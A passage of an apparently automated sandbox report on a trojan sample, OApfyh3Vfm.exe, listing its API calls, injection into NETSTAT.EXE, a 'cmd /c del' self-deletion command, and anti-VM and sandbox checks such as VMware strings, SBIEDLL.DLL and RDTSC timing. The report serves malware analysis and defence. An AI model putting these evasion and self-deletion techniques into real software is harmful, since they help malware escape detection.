            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03509650 NtQueryValueKey,LdrInitializeThunk,8_2_03509650
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03509660 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_03509660
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_035096D0 NtCreateKey,LdrInitializeThunk,8_2_035096D0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_035096E0 NtFreeVirtualMemory,LdrInitializeThunk,8_2_035096E0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03509540 NtReadFile,LdrInitializeThunk,8_2_03509540
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_035095D0 NtClose,LdrInitializeThunk,8_2_035095D0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03509B00 NtSetValueKey,8_2_03509B00
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0350A3B0 NtGetContextThread,8_2_0350A3B0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03509A10 NtQuerySection,8_2_03509A10
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03509A00 NtProtectVirtualMemory,8_2_03509A00
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03509A20 NtResumeThread,8_2_03509A20
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03509A80 NtOpenDirectoryObject,8_2_03509A80
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03509950 NtQueueApcThread,8_2_03509950
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_035099D0 NtCreateProcessEx,8_2_035099D0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0350B040 NtSuspendThread,8_2_0350B040
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03509820 NtEnumerateKey,8_2_03509820
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_035098F0 NtReadVirtualMemory,8_2_035098F0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_035098A0 NtWriteVirtualMemory,8_2_035098A0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0350A770 NtOpenThread,8_2_0350A770
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03509770 NtSetInformationFile,8_2_03509770
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03509760 NtOpenProcess,8_2_03509760
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0350A710 NtOpenProcessToken,8_2_0350A710
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03509730 NtQueryVirtualMemory,8_2_03509730
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_035097A0 NtUnmapViewOfSection,8_2_035097A0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03509670 NtQueryInformationProcess,8_2_03509670
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03509610 NtEnumerateValueKey,8_2_03509610
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03509560 NtWriteFile,8_2_03509560
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0350AD30 NtSetContextThread,8_2_0350AD30
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03509520 NtWaitForSingleObject,8_2_03509520
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_035095F0 NtQueryInformationFile,8_2_035095F0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FE86F0 NtClose,8_2_02FE86F0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FE8670 NtReadFile,8_2_02FE8670
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FE87A0 NtAllocateVirtualMemory,8_2_02FE87A0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FE85C0 NtCreateFile,8_2_02FE85C0
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FE866E NtReadFile,8_2_02FE866E
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FE879A NtAllocateVirtualMemory,8_2_02FE879A
            Source: OApfyh3Vfm.exe, 00000001.00000002.678698717.00000000036E9000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCF_Secretaria.dll< vs OApfyh3Vfm.exe
            Source: OApfyh3Vfm.exe, 00000001.00000000.667285817.0000000000316000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSearchDa.exe> vs OApfyh3Vfm.exe
            Source: OApfyh3Vfm.exe, 00000002.00000000.675427339.00000000006A6000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSearchDa.exe> vs OApfyh3Vfm.exe
            Source: OApfyh3Vfm.exe, 00000002.00000002.733597654.0000000000DCA000.00000004.00000020.sdmpBinary or memory string: OriginalFilenamenetstat.exej% vs OApfyh3Vfm.exe
            Source: OApfyh3Vfm.exe, 00000002.00000002.734139678.000000000131F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs OApfyh3Vfm.exe
            Source: OApfyh3Vfm.exeBinary or memory string: OriginalFilenameSearchDa.exe> vs OApfyh3Vfm.exe
            Source: OApfyh3Vfm.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: OApfyh3Vfm.exeVirustotal: Detection: 48%
            Source: OApfyh3Vfm.exeMetadefender: Detection: 37%
            Source: OApfyh3Vfm.exeReversingLabs: Detection: 71%
            Source: OApfyh3Vfm.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\OApfyh3Vfm.exe 'C:\Users\user\Desktop\OApfyh3Vfm.exe'
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeProcess created: C:\Users\user\Desktop\OApfyh3Vfm.exe C:\Users\user\Desktop\OApfyh3Vfm.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
            Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\OApfyh3Vfm.exe'
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeProcess created: C:\Users\user\Desktop\OApfyh3Vfm.exe C:\Users\user\Desktop\OApfyh3Vfm.exeJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\OApfyh3Vfm.exe'Jump to behavior
            Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{317D06E8-5F24-433D-BDF7-79CE68D8ABC2}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\OApfyh3Vfm.exe.logJump to behavior
            Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@19/7
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6120:120:WilError_01
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: OApfyh3Vfm.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: OApfyh3Vfm.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: netstat.pdbGCTL source: OApfyh3Vfm.exe, 00000002.00000002.733597654.0000000000DCA000.00000004.00000020.sdmp
            Source: Binary string: netstat.pdb source: OApfyh3Vfm.exe, 00000002.00000002.733597654.0000000000DCA000.00000004.00000020.sdmp
            Source: Binary string: wntdll.pdbUGP source: OApfyh3Vfm.exe, 00000002.00000002.734139678.000000000131F000.00000040.00000001.sdmp, NETSTAT.EXE, 00000008.00000002.933022512.00000000035BF000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: OApfyh3Vfm.exe, NETSTAT.EXE

            Data Obfuscation:

            barindex
            .NET source code contains potential unpackerShow sources
            Source: OApfyh3Vfm.exe, UX.WinForms/Form1.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 1.0.OApfyh3Vfm.exe.290000.0.unpack, UX.WinForms/Form1.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 1.2.OApfyh3Vfm.exe.290000.0.unpack, UX.WinForms/Form1.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 2.2.OApfyh3Vfm.exe.620000.1.unpack, UX.WinForms/Form1.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 2.0.OApfyh3Vfm.exe.620000.0.unpack, UX.WinForms/Form1.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 1_2_00294CCD push ds; retf 1_2_00294CCE
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 1_2_057561E8 push esp; iretd 1_2_057561E9
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0041B86C push eax; ret 2_2_0041B872
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0041B802 push eax; ret 2_2_0041B808
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0041B80B push eax; ret 2_2_0041B872
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0041D347 push dword ptr [FC8F742Eh]; ret 2_2_0041D380
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0041A684 push edx; retf 2_2_0041A686
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0041B7B5 push eax; ret 2_2_0041B808
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_00624CCD push ds; retf 2_2_00624CCE
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0127D0D1 push ecx; ret 2_2_0127D0E4
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0351D0D1 push ecx; ret 8_2_0351D0E4
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FED347 push dword ptr [FC8F742Eh]; ret 8_2_02FED380
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FEB86C push eax; ret 8_2_02FEB872
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FEB80B push eax; ret 8_2_02FEB872
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FEB802 push eax; ret 8_2_02FEB808
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FEA684 push edx; retf 8_2_02FEA686
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FEB7B5 push eax; ret 8_2_02FEB808
            Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02FEBD72 push ds; iretd 8_2_02FEBD73
            Source: initial sampleStatic PE information: section name: .text entropy: 7.19443434892

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Self deletion via cmd deleteShow sources
            Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: /c del 'C:\Users\user\Desktop\OApfyh3Vfm.exe'
            Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: /c del 'C:\Users\user\Desktop\OApfyh3Vfm.exe'Jump to behavior
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion:

            barindex
            Yara detected AntiVM3Show sources
            Source: Yara matchFile source: 00000001.00000002.677459714.00000000026E1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: OApfyh3Vfm.exe PID: 6332, type: MEMORYSTR
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: OApfyh3Vfm.exe, 00000001.00000002.677459714.00000000026E1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
            Source: OApfyh3Vfm.exe, 00000001.00000002.677459714.00000000026E1000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
            Tries to detect virtualization through RDTSC time measurementsShow sources
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeRDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeRDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 0000000002FD8604 second address: 0000000002FD860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 0000000002FD899E second address: 0000000002FD89A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exe TID: 6344Thread sleep time: -33306s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exe TID: 6808Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exe TID: 6012Thread sleep time: -40000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 5912Thread sleep time: -40000s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\NETSTAT.EXELast function: Thread delayed
            Source: C:\Windows\SysWOW64\NETSTAT.EXELast function: Thread delayed
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_004088D0 rdtsc 2_2_004088D0
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeThread delayed: delay time: 33306Jump to behavior
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: OApfyh3Vfm.exe, 00000001.00000002.677459714.00000000026E1000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: explorer.exe, 00000003.00000000.687181210.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: OApfyh3Vfm.exe, 00000001.00000002.677459714.00000000026E1000.00000004.00000001.sdmpBinary or memory string: vmware
            Source: explorer.exe, 00000003.00000000.683446644.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000003.00000000.687181210.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000003.00000000.680554884.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
            Source: explorer.exe, 00000003.00000000.687471430.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
            Source: OApfyh3Vfm.exe, 00000001.00000002.677459714.00000000026E1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
            Source: explorer.exe, 00000003.00000000.719000106.000000000A783000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
            Source: OApfyh3Vfm.exe, 00000001.00000002.677459714.00000000026E1000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_004088D0 rdtsc 2_2_004088D0
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01244120 mov eax, dword ptr fs:[00000030h]2_2_01244120
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01244120 mov eax, dword ptr fs:[00000030h]2_2_01244120
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01244120 mov eax, dword ptr fs:[00000030h]2_2_01244120
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01244120 mov eax, dword ptr fs:[00000030h]2_2_01244120
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01244120 mov ecx, dword ptr fs:[00000030h]2_2_01244120
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0125513A mov eax, dword ptr fs:[00000030h]2_2_0125513A
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0125513A mov eax, dword ptr fs:[00000030h]2_2_0125513A
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01229100 mov eax, dword ptr fs:[00000030h]2_2_01229100
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01229100 mov eax, dword ptr fs:[00000030h]2_2_01229100
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01229100 mov eax, dword ptr fs:[00000030h]2_2_01229100
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0122C962 mov eax, dword ptr fs:[00000030h]2_2_0122C962
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0122B171 mov eax, dword ptr fs:[00000030h]2_2_0122B171
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0122B171 mov eax, dword ptr fs:[00000030h]2_2_0122B171
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0124B944 mov eax, dword ptr fs:[00000030h]2_2_0124B944
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0124B944 mov eax, dword ptr fs:[00000030h]2_2_0124B944
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012561A0 mov eax, dword ptr fs:[00000030h]2_2_012561A0
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012561A0 mov eax, dword ptr fs:[00000030h]2_2_012561A0
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012A69A6 mov eax, dword ptr fs:[00000030h]2_2_012A69A6
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012A51BE mov eax, dword ptr fs:[00000030h]2_2_012A51BE
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012A51BE mov eax, dword ptr fs:[00000030h]2_2_012A51BE
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012A51BE mov eax, dword ptr fs:[00000030h]2_2_012A51BE
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012A51BE mov eax, dword ptr fs:[00000030h]2_2_012A51BE
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0125A185 mov eax, dword ptr fs:[00000030h]2_2_0125A185
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0124C182 mov eax, dword ptr fs:[00000030h]2_2_0124C182
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01252990 mov eax, dword ptr fs:[00000030h]2_2_01252990
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012B41E8 mov eax, dword ptr fs:[00000030h]2_2_012B41E8
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0122B1E1 mov eax, dword ptr fs:[00000030h]2_2_0122B1E1
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0122B1E1 mov eax, dword ptr fs:[00000030h]2_2_0122B1E1
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0122B1E1 mov eax, dword ptr fs:[00000030h]2_2_0122B1E1
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0125002D mov eax, dword ptr fs:[00000030h]2_2_0125002D
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0125002D mov eax, dword ptr fs:[00000030h]2_2_0125002D
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0125002D mov eax, dword ptr fs:[00000030h]2_2_0125002D
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0125002D mov eax, dword ptr fs:[00000030h]2_2_0125002D
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0125002D mov eax, dword ptr fs:[00000030h]2_2_0125002D
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0123B02A mov eax, dword ptr fs:[00000030h]2_2_0123B02A
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0123B02A mov eax, dword ptr fs:[00000030h]2_2_0123B02A
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0123B02A mov eax, dword ptr fs:[00000030h]2_2_0123B02A
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0123B02A mov eax, dword ptr fs:[00000030h]2_2_0123B02A
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012F4015 mov eax, dword ptr fs:[00000030h]2_2_012F4015
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012F4015 mov eax, dword ptr fs:[00000030h]2_2_012F4015
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012A7016 mov eax, dword ptr fs:[00000030h]2_2_012A7016
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012A7016 mov eax, dword ptr fs:[00000030h]2_2_012A7016
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012A7016 mov eax, dword ptr fs:[00000030h]2_2_012A7016
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012F1074 mov eax, dword ptr fs:[00000030h]2_2_012F1074
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012E2073 mov eax, dword ptr fs:[00000030h]2_2_012E2073
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01240050 mov eax, dword ptr fs:[00000030h]2_2_01240050
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_01240050 mov eax, dword ptr fs:[00000030h]2_2_01240050
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012520A0 mov eax, dword ptr fs:[00000030h]2_2_012520A0
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012520A0 mov eax, dword ptr fs:[00000030h]2_2_012520A0
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012520A0 mov eax, dword ptr fs:[00000030h]2_2_012520A0
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012520A0 mov eax, dword ptr fs:[00000030h]2_2_012520A0
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012520A0 mov eax, dword ptr fs:[00000030h]2_2_012520A0
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012520A0 mov eax, dword ptr fs:[00000030h]2_2_012520A0
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_012690AF mov eax, dword ptr fs:[00000030h]2_2_012690AF
            Source: C:\Users\user\Desktop\OApfyh3Vfm.exeCode function: 2_2_0125F0BF mov ecx, dword ptr fs:[00000030h]2_2_0125F0BF
